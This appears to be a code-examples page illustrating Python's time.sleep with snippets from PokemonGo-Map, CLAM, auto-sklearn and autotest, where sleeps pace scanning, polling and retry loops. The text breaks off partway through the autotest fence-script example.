time.sleep

Here are examples of the Python API time.sleep taken from open source projects. By voting up you can indicate which examples are most useful and appropriate.
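
As a quick reference before the project examples: time.sleep(seconds) blocks the calling thread for at least the given number of seconds, which is why the snippets below use it for pacing, polling and retry loops. A minimal sketch with an illustrative helper (not taken from any of the projects):

import time

def poll_until_ready(check, interval=2.0, attempts=5):
    # Illustrative helper: call `check` until it returns True,
    # sleeping `interval` seconds between attempts.
    for _ in range(attempts):
        if check():
            return True
        time.sleep(interval)  # blocks the calling thread for roughly `interval` seconds
    return False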

200 Examples

Example 1

Project: PokemonGo-Map
Source File: search.py
def search_worker_thread(args, account_queue, account_failures, search_items_queue, pause_bit, encryption_lib_path, status, dbq, whq):

    log.debug('Search worker thread starting')

    # The outer forever loop restarts only when the inner one is intentionally exited - which should only be done when the worker is failing too often, and probably banned.
    # This reinitializes the API and grabs a new account from the queue.
    while True:
        try:
            status['starttime'] = now()

            # Get account
            status['message'] = 'Waiting to get new account from the queue'
            log.info(status['message'])
            account = account_queue.get()
            status['message'] = 'Switching to account {}'.format(account['username'])
            status['user'] = account['username']
            log.info(status['message'])

            stagger_thread(args, account)

            # New lease of life right here
            status['fail'] = 0
            status['success'] = 0
            status['noitems'] = 0
            status['skip'] = 0
            status['location'] = False
            status['last_scan_time'] = 0

            # Only sleep when consecutive_fails reaches max_failures; overall fails are kept for stats.
            consecutive_fails = 0

            # Create the API instance this will use
            if args.mock != '':
                api = FakePogoApi(args.mock)
            else:
                api = PGoApi()

            if status['proxy_url']:
                log.debug("Using proxy %s", status['proxy_url'])
                api.set_proxy({'http': status['proxy_url'], 'https': status['proxy_url']})

            api.activate_signature(encryption_lib_path)

            # The forever loop for the searches
            while True:

                # If this account has been messing up too hard, let it rest
                if consecutive_fails >= args.max_failures:
                    status['message'] = 'Account {} failed more than {} scans; possibly bad account. Switching accounts...'.format(account['username'], args.max_failures)
                    log.warning(status['message'])
                    account_failures.append({'account': account, 'last_fail_time': now(), 'reason': 'failures'})
                    break  # exit this loop to get a new account and have the API recreated

                while pause_bit.is_set():
                    status['message'] = 'Scanning paused'
                    time.sleep(2)

                # If this account has been running too long, let it rest
                if (args.account_search_interval is not None):
                    if (status['starttime'] <= (now() - args.account_search_interval)):
                        status['message'] = 'Account {} is being rotated out to rest.'.format(account['username'])
                        log.info(status['message'])
                        account_failures.append({'account': account, 'last_fail_time': now(), 'reason': 'rest interval'})
                        break

                # Grab the next thing to search (when available)
                status['message'] = 'Waiting for item from queue'
                step, step_location, appears, leaves = search_items_queue.get()

                # too soon?
                if appears and now() < appears + 10:  # adding a 10 second grace period
                    first_loop = True
                    paused = False
                    while now() < appears + 10:
                        if pause_bit.is_set():
                            paused = True
                            break  # why can't python just have `break 2`...
                        remain = appears - now() + 10
                        status['message'] = 'Early for {:6f},{:6f}; waiting {}s...'.format(step_location[0], step_location[1], remain)
                        if first_loop:
                            log.info(status['message'])
                            first_loop = False
                        time.sleep(1)
                    if paused:
                        search_items_queue.task_done()
                        continue

                # too late?
                if leaves and now() > (leaves - args.min_seconds_left):
                    search_items_queue.task_done()
                    status['skip'] += 1
                    # it is slightly silly to put this in status['message'] since it'll be overwritten very shortly after. Oh well.
                    status['message'] = 'Too late for location {:6f},{:6f}; skipping'.format(step_location[0], step_location[1])
                    log.info(status['message'])
                    # No sleep here; we've not done anything worth sleeping for. Plus we clearly need to catch up!
                    continue

                # Let the api know where we intend to be for this loop
                # doing this before check_login so it does not also have to be done there
                # when the auth token is refreshed
                api.set_position(*step_location)

                # Ok, let's get started -- check our login status
                check_login(args, account, api, step_location, status['proxy_url'])

                # putting this message after the check_login so the messages aren't out of order
                status['message'] = 'Searching at {:6f},{:6f}'.format(step_location[0], step_location[1])
                log.info(status['message'])

                # Make the actual request (finally!)
                response_dict = map_request(api, step_location, args.jitter)

                # G'damnit, nothing back. Mark it up, sleep, carry on
                if not response_dict:
                    status['fail'] += 1
                    consecutive_fails += 1
                    status['message'] = 'Invalid response at {:6f},{:6f}, abandoning location'.format(step_location[0], step_location[1])
                    log.error(status['message'])
                    time.sleep(args.scan_delay)
                    continue

                # Got the response, parse it out, send todo's to db/wh queues
                try:
                    parsed = parse_map(args, response_dict, step_location, dbq, whq, api)
                    search_items_queue.task_done()
                    status[('success' if parsed['count'] > 0 else 'noitems')] += 1
                    consecutive_fails = 0
                    status['message'] = 'Search at {:6f},{:6f} completed with {} finds'.format(step_location[0], step_location[1], parsed['count'])
                    log.debug(status['message'])
                except KeyError:
                    parsed = False
                    status['fail'] += 1
                    consecutive_fails += 1
                    status['message'] = 'Map parse failed at {:6f},{:6f}, abandoning location. {} may be banned.'.format(step_location[0], step_location[1], account['username'])
                    log.exception(status['message'])

                # Get detailed information about gyms
                if args.gym_info and parsed:
                    # build up a list of gyms to update
                    gyms_to_update = {}
                    for gym in parsed['gyms'].values():
                        # Can only get gym details within 1km of our position
                        distance = calc_distance(step_location, [gym['latitude'], gym['longitude']])
                        if distance < 1:
                            # check if we already have details on this gym (if not, get them)
                            try:
                                record = GymDetails.get(gym_id=gym['gym_id'])
                            except GymDetails.DoesNotExist as e:
                                gyms_to_update[gym['gym_id']] = gym
                                continue

                            # if we have a record of this gym already, check if the gym has been updated since our last update
                            if record.last_scanned < gym['last_modified']:
                                gyms_to_update[gym['gym_id']] = gym
                                continue
                            else:
                                log.debug('Skipping update of gym @ %f/%f, up to date', gym['latitude'], gym['longitude'])
                                continue
                        else:
                            log.debug('Skipping update of gym @ %f/%f, too far away from our location at %f/%f (%fkm)', gym['latitude'], gym['longitude'], step_location[0], step_location[1], distance)

                    if len(gyms_to_update):
                        gym_responses = {}
                        current_gym = 1
                        status['message'] = 'Updating {} gyms for location {},{}...'.format(len(gyms_to_update), step_location[0], step_location[1])
                        log.debug(status['message'])

                        for gym in gyms_to_update.values():
                            status['message'] = 'Getting details for gym {} of {} for location {},{}...'.format(current_gym, len(gyms_to_update), step_location[0], step_location[1])
                            time.sleep(random.random() + 2)
                            response = gym_request(api, step_location, gym)

                            # make sure the gym was in range. (sometimes the API gets cranky about gyms that are ALMOST 1km away)
                            if response['responses']['GET_GYM_DETAILS']['result'] == 2:
                                log.warning('Gym @ %f/%f is out of range (%dkm), skipping', gym['latitude'], gym['longitude'], distance)
                            else:
                                gym_responses[gym['gym_id']] = response['responses']['GET_GYM_DETAILS']

                            # increment which gym we're on (for status messages)
                            current_gym += 1

                        status['message'] = 'Processing details of {} gyms for location {},{}...'.format(len(gyms_to_update), step_location[0], step_location[1])
                        log.debug(status['message'])

                        if gym_responses:
                            parse_gyms(args, gym_responses, whq)

                # Record the time and place the worker left off at
                status['last_scan_time'] = now()
                status['location'] = step_location

                # Always delay the desired amount after "scan" completion
                status['message'] += ', sleeping {}s until {}'.format(args.scan_delay, time.strftime('%H:%M:%S', time.localtime(time.time() + args.scan_delay)))
                time.sleep(args.scan_delay)

        # catch any process exceptions, log them, and continue the thread
        except Exception as e:
            status['message'] = 'Exception in search_worker using account {}. Restarting with fresh account. See logs for details.'.format(account['username'])
            time.sleep(args.scan_delay)
            log.error('Exception in search_worker under account {}. Exception message: {}'.format(account['username'], e))
            account_failures.append({'account': account, 'last_fail_time': now(), 'reason': 'exception'})
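
A stripped-down sketch of how Example 1 uses time.sleep both as a pause gate and to pace the scan loop; it assumes pause_bit is a threading.Event (the is_set() calls suggest as much) and the worker body is only a placeholder:

import threading
import time

pause_bit = threading.Event()   # assumed stand-in for the pause_bit argument above

def worker(scan_delay=10):
    while True:
        while pause_bit.is_set():   # sit out a pause request
            time.sleep(2)
        # ... perform one scan step here ...
        time.sleep(scan_delay)      # always delay after a scan, like args.scan_delay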

Example 2

Project: clam
Source File: clamdispatcher.py
def main():
    if len(sys.argv) < 4:
        print("[CLAM Dispatcher] ERROR: Invalid syntax, use clamdispatcher.py [pythonpath] settingsmodule projectdir cmd arg1 arg2 ... got: " + " ".join(sys.argv[1:]), file=sys.stderr)
        with open('.done','w') as f:
            f.write(str(1))
        if os.path.exists('.pid'): os.unlink('.pid')
        return 1

    offset = 0
    if '/' in sys.argv[1]:
        #os.environ['PYTHONPATH'] = sys.argv[1]
        for path in sys.argv[1].split(':'):
            print("[CLAM Dispatcher] Adding to PYTHONPATH: " + path, file=sys.stderr)
            sys.path.append(path)
        offset = 1

    settingsmodule = sys.argv[1+offset]
    projectdir = sys.argv[2+offset]
    if projectdir == 'NONE': #Actions
        tmpdir = None
        projectdir = None
    elif projectdir.startswith('tmp://'): #Used for actions with a temporary dir
        tmpdir = projectdir[6:]
        projectdir = None
    else:
        if projectdir[-1] != '/':
            projectdir += '/'
        tmpdir = os.path.join(projectdir,'tmp')

    print("[CLAM Dispatcher] Started CLAM Dispatcher v" + str(VERSION) + " with " + settingsmodule + " (" + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S') + ")", file=sys.stderr)

    cmd = sys.argv[3+offset]
    cmd = clam.common.data.unescapeshelloperators(cmd) #shell operators like pipes and redirects were passed in an escaped form
    if sys.version[0] == '2' and isinstance(cmd,str):
        cmd = unicode(cmd,'utf-8') #pylint: disable=undefined-variable
    for arg in sys.argv[4+offset:]:
        arg_u = clam.common.data.unescapeshelloperators(arg)
        if arg_u != arg:
            cmd += " " + arg_u #shell operator (pipe or something)
        else:
            cmd += " " + clam.common.data.shellsafe(arg,'"')


    if not cmd:
        print("[CLAM Dispatcher] FATAL ERROR: No command specified!", file=sys.stderr)
        if projectdir:
            f = open(projectdir + '.done','w')
            f.write(str(1))
            f.close()
            if os.path.exists(projectdir + '.pid'): os.unlink(projectdir + '.pid')
        return 1
    elif projectdir and not os.path.isdir(projectdir):
        print("[CLAM Dispatcher] FATAL ERROR: Project directory "+ projectdir + " does not exist", file=sys.stderr)
        f = open(projectdir + '.done','w')
        f.write(str(1))
        f.close()
        if os.path.exists(projectdir + '.pid'): os.unlink(projectdir + '.pid')
        return 1

    try:
        #exec("import " + settingsmodule + " as settings")
        settings = __import__(settingsmodule , globals(), locals(),0)
        try:
            if settings.CUSTOM_FORMATS:
                clam.common.data.CUSTOM_FORMATS = settings.CUSTOM_FORMATS
                print("[CLAM Dispatcher] Dependency injection for custom formats succeeded", file=sys.stderr)
        except AttributeError:
            pass
    except ImportError as e:
        print("[CLAM Dispatcher] FATAL ERROR: Unable to import settings module, settingsmodule is " + settingsmodule + ", error: " + str(e), file=sys.stderr)
        print("[CLAM Dispatcher]      hint: If you're using the development server, check you pass the path your service configuration file is in using the -P flag. For Apache integration, verify you add this path to your PYTHONPATH (can be done from the WSGI script)", file=sys.stderr)
        if projectdir:
            f = open(projectdir + '.done','w')
            f.write(str(1))
            f.close()
        return 1

    settingkeys = dir(settings)
    if not 'DISPATCHER_POLLINTERVAL' in settingkeys:
        settings.DISPATCHER_POLLINTERVAL = 30
    if not 'DISPATCHER_MAXRESMEM' in settingkeys:
        settings.DISPATCHER_MAXRESMEM = 0
    if not 'DISPATCHER_MAXTIME' in settingkeys:
        settings.DISPATCHER_MAXTIME = 0


    try:
        print("[CLAM Dispatcher] Running " + cmd, file=sys.stderr)
    except (UnicodeDecodeError, UnicodeError, UnicodeEncodeError):
        print("[CLAM Dispatcher] Running " + repr(cmd), file=sys.stderr) #unicode-issues on Python 2

    if sys.version[0] == '2' and isinstance(cmd,unicode): #pylint: disable=undefined-variable
        cmd = cmd.encode('utf-8')
    if projectdir:
        process = subprocess.Popen(cmd,cwd=projectdir, shell=True, stderr=sys.stderr)
    else:
        process = subprocess.Popen(cmd, shell=True, stderr=sys.stderr)
    begintime = datetime.datetime.now()
    if process:
        pid = process.pid
        print("[CLAM Dispatcher] Running with pid " + str(pid) + " (" + begintime.strftime('%Y-%m-%d %H:%M:%S') + ")", file=sys.stderr)
        sys.stderr.flush()
        if projectdir:
            with open(projectdir + '.pid','w') as f:
                f.write(str(pid))
    else:
        print("[CLAM Dispatcher] Unable to launch process", file=sys.stderr)
        sys.stderr.flush()
        if projectdir:
            with open(projectdir + '.done','w') as f:
                f.write(str(1))
        return 1

    #intervalf = lambda s: min(s/10.0, 15)
    abort = False
    idle = 0
    done = False
    lastpolltime = datetime.datetime.now()
    lastabortchecktime = datetime.datetime.now()

    while not done:
        d = total_seconds(datetime.datetime.now() - begintime)
        try:
            returnedpid, statuscode = os.waitpid(pid, os.WNOHANG)
            if returnedpid != 0:
                print("[CLAM Dispatcher] Process ended (" + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S') + ", " + str(d)+"s) ", file=sys.stderr)
                done = True
        except OSError: #no such process
            print("[CLAM Dispatcher] Process lost! (" + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S') + ", " + str(d)+"s)", file=sys.stderr)
            statuscode = 1
            done = True

        if done:
            break

        if total_seconds(datetime.datetime.now() - lastabortchecktime) >= min(10, d* 0.5):  #every 10 seconds, faster at beginning
            if projectdir and os.path.exists(projectdir + '.abort'):
                abort = True
            if abort:
                print("[CLAM Dispatcher] ABORTING PROCESS ON SIGNAL! (" + str(d)+"s)", file=sys.stderr)
                os.system("sleep 30 && kill -9 " + str(pid) + " &") #deathtrap in case the process doesn't listen within 30 seconds
                os.kill(pid, signal.SIGTERM)
                os.waitpid(pid, 0)
                if projectdir:
                    os.unlink(projectdir + '.abort')
                    open(projectdir + '.aborted','w').close()
                done = True
                break
            lastabortchecktime = datetime.datetime.now()


        if d <= 1:
            idle += 0.05
            time.sleep(0.05)
        elif d <= 2:
            idle += 0.2
            time.sleep(0.2)
        elif d <= 10:
            idle += 0.5
            time.sleep(0.5)
        else:
            idle += 1
            time.sleep(1)

        if settings.DISPATCHER_MAXRESMEM > 0 and total_seconds(datetime.datetime.now() - lastpolltime) >= settings.DISPATCHER_POLLINTERVAL:
            resmem = mem(pid)
            if resmem > settings.DISPATCHER_MAXRESMEM * 1024:
                print("[CLAM Dispatcher] PROCESS EXCEEDS MAXIMUM RESIDENT MEMORY USAGE (" + str(resmem) + ' >= ' + str(settings.DISPATCHER_MAXRESMEM) + ')... ABORTING', file=sys.stderr)
                abort = True
                statuscode = 2
            lastpolltime = datetime.datetime.now()
        elif settings.DISPATCHER_MAXTIME > 0 and d > settings.DISPATCHER_MAXTIME:
            print("[CLAM Dispatcher] PROCESS TIMED OUT.. NO COMPLETION WITHIN " + str(d) + " SECONDS ... ABORTING", file=sys.stderr)
            abort = True
            statuscode = 3

    if projectdir:
        with open(projectdir + '.done','w') as f:
            f.write(str(statuscode))
        if os.path.exists(projectdir + '.pid'): os.unlink(projectdir + '.pid')

        #remove project index cache (has to be recomputed next time because this project now has a different size)
        if os.path.exists(os.path.join(projectdir,'..','.index')):
            os.unlink(os.path.join(projectdir,'..','.index'))


    if tmpdir and os.path.exists(tmpdir):
        print("[CLAM Dispatcher] Removing temporary files", file=sys.stderr)
        for filename in os.listdir(tmpdir):
            filepath = os.path.join(tmpdir,filename)
            try:
                if os.path.isdir(filepath):
                    shutil.rmtree(filepath)
                else:
                    os.unlink(filepath)
            except: #pylint: disable=bare-except
                print("[CLAM Dispatcher] Unable to remove " + filename, file=sys.stderr)

    d = total_seconds(datetime.datetime.now() - begintime)
    if statuscode > 127:
        print("[CLAM Dispatcher] Status code out of range (" + str(statuscode) + "), setting to 127", file=sys.stderr)
        statuscode = 127
    print("[CLAM Dispatcher] Finished (" + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S') + "), exit code " + str(statuscode) + ", dispatcher wait time " + str(idle)  + "s, duration " + str(d) + "s", file=sys.stderr)

    return statuscode
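
Example 2 polls its child process with graduated sleeps, pausing for a few hundredths of a second right after launch and backing off to one second later on. A minimal sketch of that cadence, with hypothetical helper names not taken from clam:

import time

def graduated_delay(elapsed):
    # Mirror the dispatcher's cadence: poll often right after launch,
    # then back off towards one second.
    if elapsed <= 1:
        return 0.05
    elif elapsed <= 2:
        return 0.2
    elif elapsed <= 10:
        return 0.5
    return 1.0

def wait_for(predicate, limit=30):
    # Illustrative wait loop: sleep with the graduated delay until
    # `predicate` returns True or `limit` seconds have passed.
    start = time.time()
    while not predicate():
        elapsed = time.time() - start
        if elapsed > limit:
            return False
        time.sleep(graduated_delay(elapsed))
    return True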

Example 3

Project: auto-sklearn
Source File: ensemble_builder.py
    def main(self):

        watch = StopWatch()
        watch.start_task('ensemble_builder')

        used_time = 0
        time_iter = 0
        index_run = 0
        num_iteration = 0
        current_num_models = 0
        last_hash = None
        current_hash = None

        dir_ensemble = os.path.join(self.backend.temporary_directory,
                                    '.auto-sklearn',
                                    'predictions_ensemble')
        dir_valid = os.path.join(self.backend.temporary_directory,
                                 '.auto-sklearn',
                                 'predictions_valid')
        dir_test = os.path.join(self.backend.temporary_directory,
                                '.auto-sklearn',
                                'predictions_test')
        paths_ = [dir_ensemble, dir_valid, dir_test]

        dir_ensemble_list_mtimes = []

        self.logger.debug('Starting main loop with %f seconds and %d iterations '
                          'left.' % (self.limit - used_time, num_iteration))
        while used_time < self.limit or (self.max_iterations > 0 and
                                         self.max_iterations >= num_iteration):
            num_iteration += 1
            self.logger.debug('Time left: %f', self.limit - used_time)
            self.logger.debug('Time last ensemble building: %f', time_iter)

            # Reload the ensemble targets every iteration. This is important because cv may
            # update the ensemble targets in the course of running auto-sklearn.
            # TODO update cv in order to not need this any more!
            targets_ensemble = self.backend.load_targets_ensemble()

            # Load the predictions from the models
            exists = [os.path.isdir(dir_) for dir_ in paths_]
            if not exists[0]:  # all(exists):
                self.logger.debug('Prediction directory %s does not exist!' %
                              dir_ensemble)
                time.sleep(2)
                used_time = watch.wall_elapsed('ensemble_builder')
                continue

            if self.shared_mode is False:
                dir_ensemble_list = sorted(glob.glob(os.path.join(
                    dir_ensemble, 'predictions_ensemble_%s_*.npy' % self.seed)))
                if exists[1]:
                    dir_valid_list = sorted(glob.glob(os.path.join(
                        dir_valid, 'predictions_valid_%s_*.npy' % self.seed)))
                else:
                    dir_valid_list = []
                if exists[2]:
                    dir_test_list = sorted(glob.glob(os.path.join(
                        dir_test, 'predictions_test_%s_*.npy' % self.seed)))
                else:
                    dir_test_list = []
            else:
                dir_ensemble_list = sorted(os.listdir(dir_ensemble))
                dir_valid_list = sorted(os.listdir(dir_valid)) if exists[1] else []
                dir_test_list = sorted(os.listdir(dir_test)) if exists[2] else []

            # Check the modification times because predictions can be updated
            # over time!
            old_dir_ensemble_list_mtimes = dir_ensemble_list_mtimes
            dir_ensemble_list_mtimes = []
            # The ensemble dir can contain non-model files. We filter them and
            # use the following list instead
            dir_ensemble_model_files = []

            for dir_ensemble_file in dir_ensemble_list:
                if dir_ensemble_file.endswith("/"):
                    dir_ensemble_file = dir_ensemble_file[:-1]
                if not dir_ensemble_file.endswith(".npy"):
                    self.logger.warning('Error loading file (not .npy): %s', dir_ensemble_file)
                    continue

                dir_ensemble_model_files.append(dir_ensemble_file)
                basename = os.path.basename(dir_ensemble_file)
                dir_ensemble_file = os.path.join(dir_ensemble, basename)
                mtime = os.path.getmtime(dir_ensemble_file)
                dir_ensemble_list_mtimes.append(mtime)

            if len(dir_ensemble_model_files) == 0:
                self.logger.debug('Directories are empty')
                time.sleep(2)
                used_time = watch.wall_elapsed('ensemble_builder')
                continue

            if len(dir_ensemble_model_files) <= current_num_models and \
                    old_dir_ensemble_list_mtimes == dir_ensemble_list_mtimes:
                self.logger.debug('Nothing has changed since the last time')
                time.sleep(2)
                used_time = watch.wall_elapsed('ensemble_builder')
                continue

            with warnings.catch_warnings():
                warnings.simplefilter('ignore')
                # TODO restructure time management in the ensemble builder,
                # what is the time of index_run actually needed for?
                watch.start_task('index_run' + str(index_run))
            watch.start_task('ensemble_iter_' + str(num_iteration))

            # List of num_runs (which are in the filename) which will be included
            #  later
            include_num_runs = []
            backup_num_runs = []
            model_and_automl_re = re.compile(r'_([0-9]*)_([0-9]*)\.npy$')
            if self.ensemble_nbest is not None:
                # Keeps track of the single scores of each model in our ensemble
                scores_nbest = []
                # The indices of the model that are currently in our ensemble
                indices_nbest = []
                # The names of the models
                model_names = []

            model_names_to_scores = dict()

            model_idx = 0
            for model_name in dir_ensemble_model_files:
                if model_name.endswith("/"):
                    model_name = model_name[:-1]
                basename = os.path.basename(model_name)

                try:
                    if self.precision == "16":
                        predictions = np.load(os.path.join(dir_ensemble, basename)).astype(dtype=np.float16)
                    elif self.precision == "32":
                        predictions = np.load(os.path.join(dir_ensemble, basename)).astype(dtype=np.float32)
                    elif self.precision == "64":
                        predictions = np.load(os.path.join(dir_ensemble, basename)).astype(dtype=np.float64)
                    else:
                        predictions = np.load(os.path.join(dir_ensemble, basename))

                    score = calculate_score(targets_ensemble, predictions,
                                            self.task_type, self.metric,
                                            predictions.shape[1])

                except Exception as e:
                    self.logger.warning('Error loading %s: %s - %s',
                                        basename, type(e), e)
                    score = -1

                model_names_to_scores[model_name] = score
                match = model_and_automl_re.search(model_name)
                automl_seed = int(match.group(1))
                num_run = int(match.group(2))

                if self.ensemble_nbest is not None:
                    if score <= 0.001:
                        self.logger.info('Model only predicts at random: ' +
                                         model_name + ' has score: ' + str(score))
                        backup_num_runs.append((automl_seed, num_run))
                    # If we have less models in our ensemble than ensemble_nbest add
                    # the current model if it is better than random
                    elif len(scores_nbest) < self.ensemble_nbest:
                        scores_nbest.append(score)
                        indices_nbest.append(model_idx)
                        include_num_runs.append((automl_seed, num_run))
                        model_names.append(model_name)
                    else:
                        # Take the worst performing model in our ensemble so far
                        idx = np.argmin(np.array([scores_nbest]))

                        # If the current model is better than the worst model in
                        # our ensemble replace it by the current model
                        if scores_nbest[idx] < score:
                            self.logger.info(
                                'Worst model in our ensemble: %s with score %f '
                                'will be replaced by model %s with score %f',
                                model_names[idx], scores_nbest[idx], model_name,
                                score)
                            # Exclude the old model
                            del scores_nbest[idx]
                            scores_nbest.append(score)
                            del include_num_runs[idx]
                            del indices_nbest[idx]
                            indices_nbest.append(model_idx)
                            include_num_runs.append((automl_seed, num_run))
                            del model_names[idx]
                            model_names.append(model_name)

                        # Otherwise exclude the current model from the ensemble
                        else:
                            # include_num_runs.append(True)
                            pass

                else:
                    # Load all predictions that are better than random
                    if score <= 0.001:
                        # include_num_runs.append(True)
                        self.logger.info('Model only predicts at random: ' +
                                         model_name + ' has score: ' +
                                         str(score))
                        backup_num_runs.append((automl_seed, num_run))
                    else:
                        include_num_runs.append((automl_seed, num_run))

                model_idx += 1

            # If there is no model better than random guessing, we have to use
            # all models which do random guessing
            if len(include_num_runs) == 0:
                include_num_runs = backup_num_runs

            indices_to_model_names = dict()
            indices_to_run_num = dict()
            for i, model_name in enumerate(dir_ensemble_model_files):
                match = model_and_automl_re.search(model_name)
                automl_seed = int(match.group(1))
                num_run = int(match.group(2))
                if (automl_seed, num_run) in include_num_runs:
                    num_indices = len(indices_to_model_names)
                    indices_to_model_names[num_indices] = model_name
                    indices_to_run_num[num_indices] = (automl_seed, num_run)

            try:
                all_predictions_train, all_predictions_valid, all_predictions_test =\
                    self.get_all_predictions(dir_ensemble,
                                             dir_ensemble_model_files,
                                             dir_valid, dir_valid_list,
                                             dir_test, dir_test_list,
                                             include_num_runs,
                                             model_and_automl_re,
                                             self.precision)
            except IOError:
                self.logger.error('Could not load the predictions.')
                continue

            if len(include_num_runs) == 0:
                self.logger.error('All models do just random guessing')
                time.sleep(2)
                continue

            else:
                ensemble = EnsembleSelection(ensemble_size=self.ensemble_size,
                                             task_type=self.task_type,
                                             metric=self.metric)

                try:
                    ensemble.fit(all_predictions_train, targets_ensemble,
                                 include_num_runs)
                    self.logger.info(ensemble)

                except ValueError as e:
                    self.logger.error('Caught ValueError: ' + str(e))
                    used_time = watch.wall_elapsed('ensemble_builder')
                    time.sleep(2)
                    continue
                except IndexError as e:
                    self.logger.error('Caught IndexError: ' + str(e))
                    used_time = watch.wall_elapsed('ensemble_builder')
                    time.sleep(2)
                    continue
                except Exception as e:
                    self.logger.error('Caught error! %s', str(e))
                    used_time = watch.wall_elapsed('ensemble_builder')
                    time.sleep(2)
                    continue

                # Output the score
                self.logger.info('Training performance: %f' % ensemble.train_score_)

                self.logger.info('Building the ensemble took %f seconds' %
                            watch.wall_elapsed('ensemble_iter_' + str(num_iteration)))

            # Set this variable here to avoid re-running the ensemble builder
            # every two seconds in case the ensemble did not change
            current_num_models = len(dir_ensemble_model_files)

            ensemble_predictions = ensemble.predict(all_predictions_train)
            if sys.version_info[0] == 2:
                ensemble_predictions.flags.writeable = False
                current_hash = hash(ensemble_predictions.data)
            else:
                current_hash = hash(ensemble_predictions.data.tobytes())

            # Only output a new ensemble and new predictions if the output of the
            # ensemble would actually change!
            # TODO this is neither safe (collisions, tests only with the ensemble
            #  prediction, but not the ensemble), implement a hash function for
            # each possible ensemble builder.
            if last_hash is not None:
                if current_hash == last_hash:
                    self.logger.info('Ensemble output did not change.')
                    time.sleep(2)
                    continue
                else:
                    last_hash = current_hash
            else:
                last_hash = current_hash

            # Save the ensemble for later use in the main auto-sklearn module!
            self.backend.save_ensemble(ensemble, index_run, self.seed)

            # Save predictions for valid and test data set
            if len(dir_valid_list) == len(dir_ensemble_model_files):
                all_predictions_valid = np.array(all_predictions_valid)
                ensemble_predictions_valid = ensemble.predict(all_predictions_valid)
                if self.task_type == BINARY_CLASSIFICATION:
                    ensemble_predictions_valid = ensemble_predictions_valid[:, 1]
                if self.low_precision:
                    if self.task_type in [BINARY_CLASSIFICATION, MULTICLASS_CLASSIFICATION, MULTILABEL_CLASSIFICATION]:
                        ensemble_predictions_valid[ensemble_predictions_valid < 1e-4] = 0.
                    if self.metric in [BAC_METRIC, F1_METRIC]:
                        bin_array = np.zeros(ensemble_predictions_valid.shape, dtype=np.int32)
                        if (self.task_type != MULTICLASS_CLASSIFICATION) or (
                            ensemble_predictions_valid.shape[1] == 1):
                            bin_array[ensemble_predictions_valid >= 0.5] = 1
                        else:
                            sample_num = ensemble_predictions_valid.shape[0]
                            for i in range(sample_num):
                                j = np.argmax(ensemble_predictions_valid[i, :])
                                bin_array[i, j] = 1
                        ensemble_predictions_valid = bin_array
                    if self.task_type in CLASSIFICATION_TASKS:
                        if ensemble_predictions_valid.size < (20000 * 20):
                            precision = 3
                        else:
                            precision = 2
                    else:
                        if ensemble_predictions_valid.size > 1000000:
                            precision = 4
                        else:
                            # File size maximally 2.1MB
                            precision = 6

                self.backend.save_predictions_as_txt(ensemble_predictions_valid,
                                                'valid', index_run, prefix=self.dataset_name,
                                                precision=precision)
            else:
                self.logger.info('Could not find as many validation set predictions (%d) '
                             'as ensemble predictions (%d)!',
                            len(dir_valid_list), len(dir_ensemble_model_files))

            del all_predictions_valid

            if len(dir_test_list) == len(dir_ensemble_model_files):
                all_predictions_test = np.array(all_predictions_test)
                ensemble_predictions_test = ensemble.predict(all_predictions_test)
                if self.task_type == BINARY_CLASSIFICATION:
                    ensemble_predictions_test = ensemble_predictions_test[:, 1]
                if self.low_precision:
                    if self.task_type in [BINARY_CLASSIFICATION, MULTICLASS_CLASSIFICATION, MULTILABEL_CLASSIFICATION]:
                        ensemble_predictions_test[ensemble_predictions_test < 1e-4] = 0.
                    if self.metric in [BAC_METRIC, F1_METRIC]:
                        bin_array = np.zeros(ensemble_predictions_test.shape,
                                             dtype=np.int32)
                        if (self.task_type != MULTICLASS_CLASSIFICATION) or (
                                    ensemble_predictions_test.shape[1] == 1):
                            bin_array[ensemble_predictions_test >= 0.5] = 1
                        else:
                            sample_num = ensemble_predictions_test.shape[0]
                            for i in range(sample_num):
                                j = np.argmax(ensemble_predictions_test[i, :])
                                bin_array[i, j] = 1
                        ensemble_predictions_test = bin_array
                    if self.task_type in CLASSIFICATION_TASKS:
                        if ensemble_predictions_test.size < (20000 * 20):
                            precision = 3
                        else:
                            precision = 2
                    else:
                        if ensemble_predictions_test.size > 1000000:
                            precision = 4
                        else:
                            precision = 6

                self.backend.save_predictions_as_txt(ensemble_predictions_test,
                                                     'test', index_run, prefix=self.dataset_name,
                                                     precision=precision)
            else:
                self.logger.info('Could not find as many test set predictions (%d) as '
                             'ensemble predictions (%d)!',
                            len(dir_test_list), len(dir_ensemble_model_files))

            del all_predictions_test

            current_num_models = len(dir_ensemble_model_files)
            watch.stop_task('index_run' + str(index_run))
            time_iter = watch.get_wall_dur('index_run' + str(index_run))
            used_time = watch.wall_elapsed('ensemble_builder')
            index_run += 1
        return
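
Example 3 sleeps for two seconds whenever there is nothing new to build, so the ensemble builder does not busy-loop while waiting for prediction files. A small sketch of that wait under a wall-clock budget (the helper name and its arguments are illustrative, not part of auto-sklearn):

import os
import time

def wait_for_npy_files(directory, timeout=60, poll=2):
    # Illustrative helper: sleep between checks until .npy prediction files
    # appear in `directory` or the overall time budget runs out.
    deadline = time.time() + timeout
    while time.time() < deadline:
        if os.path.isdir(directory) and any(
                name.endswith('.npy') for name in os.listdir(directory)):
            return True
        time.sleep(poll)
    return False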

Example 4

Project: autotest
Source File: fence_apc_snmp.py
def main():
    apc_base = "enterprises.apc.products.hardware."
    apc_outletctl = "masterswitch.sPDUOutletControl.sPDUOutletControlTable.sPDUOutletControlEntry.sPDUOutletCtl."
    apc_outletstatus = "masterswitch.sPDUOutletStatus.sPDUOutletStatusMSPTable.sPDUOutletStatusMSPEntry.sPDUOutletStatusMSP."

    address = ""
    output = ""
    port = ""
    action = "outletReboot"
    status_check = False
    verbose = False

    if not glob('/usr/share/snmp/mibs/powernet*.mib'):
        sys.stderr.write('This APC Fence script uses snmp to control the APC power switch. This script requires that net-snmp-utils be installed on all nodes in the cluster, and that the powernet369.mib file be located in /usr/share/snmp/mibs/\n')
        sys.exit(1)

    if len(sys.argv) > 1:
        try:
            opts, args = getopt.getopt(sys.argv[1:], "a:hl:p:n:o:vV", ["help", "output="])
        except getopt.GetoptError:
            # print help info and quit
            usage()
            sys.exit(2)

        for o, a in opts:
            if o == "-v":
                verbose = True
            if o == "-V":
